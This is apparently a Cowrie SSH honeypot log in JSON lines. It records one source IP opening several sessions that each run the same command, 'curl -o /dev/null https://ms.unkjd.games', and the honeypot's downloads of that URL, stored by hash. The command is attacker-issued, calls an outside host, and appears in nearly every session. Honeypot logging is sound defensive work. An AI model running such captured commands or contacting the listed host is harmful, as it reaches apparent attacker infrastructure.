{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.627234Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.628592Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.629432Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.669392Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.670578Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.671546Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.675765Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.676804Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.678129Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.678754Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.717936Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.720315Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.722486Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.723461Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.728523Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.729386Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.731299Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.731956Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.735387Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.738505Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.765317Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.768598Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.770906Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.771586Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.776614Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.777279Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.800954Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.801665Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.828836Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.830824Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.833066Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.835372Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.836604Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.837113Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.838792Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.839231Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.873800Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.874454Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.877403Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.879878Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.881727Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.882109Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.885164Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.885842Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.911519Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.913512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.915751Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.917532Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.918061Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.922195Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.923240Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.925514Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.926145Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.955220Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.957266Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.959544Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.961137Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.961590Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.963977Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.964708Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:13.967573Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.968272Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.971662Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:13.999462Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.001434Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.003757Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.004580Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.006502Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.007654Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.010159Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.010547Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.042941Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.045418Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.048380Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.050169Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.050984Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.055537Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.056070Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:14.058804Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:14.059452Z","src_ip":"212.227.125.160","session":"9f264c568782"}
